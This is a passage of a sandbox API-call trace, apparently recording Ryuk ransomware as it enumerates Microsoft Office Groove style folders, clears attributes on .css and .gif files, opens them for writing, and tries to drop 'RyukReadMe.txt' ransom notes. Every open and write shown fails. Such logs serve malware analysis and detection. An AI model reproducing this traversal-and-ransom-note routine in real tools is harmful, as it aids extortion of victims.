[0137.078] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.078] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.078] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.078] SetLastError (dwErrCode=0x0) [0137.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.078] GetLastError () returned 0x5 [0137.078] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.078] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.078] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.078] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue.css", dwFileAttributes=0x80) returned 0 [0137.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BabyBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\babyblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.079] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.079] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.079] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.079] SetLastError (dwErrCode=0x0) [0137.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.079] GetLastError () returned 0x5 [0137.079] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.079] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.079] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.080] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.080] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.080] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.080] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\biscay\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.081] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.081] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.081] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.081] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.081] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\biscay\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.081] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.081] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.081] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.081] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.082] SetLastError (dwErrCode=0x0) [0137.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\biscay\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.082] GetLastError () returned 0x5 [0137.082] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.082] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.082] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.082] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay.css", dwFileAttributes=0x80) returned 0 [0137.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Biscay.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\biscay.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.082] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.082] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.082] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.082] SetLastError (dwErrCode=0x0) [0137.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.083] GetLastError () returned 0x5 [0137.083] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.083] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.083] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.083] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.083] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.083] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\background.gif", dwFileAttributes=0x80) returned 0 [0137.083] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.083] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.083] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.083] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.083] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\button.gif", dwFileAttributes=0x80) returned 0 [0137.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\button.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.084] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.084] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.084] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.084] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.084] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\tab_off.gif", dwFileAttributes=0x80) returned 0 [0137.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\tab_off.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.085] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.085] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.085] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.085] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.085] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\tab_on.gif", dwFileAttributes=0x80) returned 0 [0137.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\tab_on.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.085] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.085] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.086] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.086] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.086] SetLastError (dwErrCode=0x0) [0137.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.086] GetLastError () returned 0x5 [0137.086] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.086] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.086] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.086] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange.css", dwFileAttributes=0x80) returned 0 [0137.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightOrange.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightorange.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.087] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.087] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.087] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.087] SetLastError (dwErrCode=0x0) [0137.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.087] GetLastError () returned 0x5 [0137.087] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.087] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.087] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.087] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.088] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.088] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.088] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.088] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.088] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.088] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.089] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.089] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.089] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.089] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.089] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.089] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.089] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.089] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.090] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.090] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.090] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.090] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.090] SetLastError (dwErrCode=0x0) [0137.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.090] GetLastError () returned 0x5 [0137.090] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.090] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.090] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.090] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow.css", dwFileAttributes=0x80) returned 0 [0137.090] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\BrightYellow.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\brightyellow.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.090] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.091] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.091] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.091] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Casual.css", dwFileAttributes=0x80) returned 0 [0137.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Casual.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\casual.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.091] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.091] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.091] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.091] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.091] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Country.css", dwFileAttributes=0x80) returned 0 [0137.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Country.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\country.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.092] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.092] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.092] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.092] SetLastError (dwErrCode=0x0) [0137.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.092] GetLastError () returned 0x5 [0137.092] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.092] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.092] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.093] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.093] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.093] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsstyles\\desert\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.093] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.093] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.094] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.094] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsStyles\\Desert\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.094] CreateFileW 